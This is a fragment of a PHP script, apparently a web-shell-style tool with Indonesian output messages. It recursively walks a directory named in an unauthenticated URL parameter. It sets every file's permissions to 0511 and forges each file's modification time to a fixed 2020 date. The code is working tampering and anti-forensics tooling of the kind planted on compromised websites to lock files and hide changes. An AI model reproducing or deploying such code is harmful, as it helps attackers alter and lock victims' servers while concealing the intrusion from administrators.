recursive_directory($sc); chmod($sc, 0511); touch($sc, strtotime('2020-11-16 14:14:06')); echo "Berhasil mengganti izin : " . $sc . "
"; } } } } $instance = new UbahIzin; $instance->recursive_directory($_GET['path']); ?>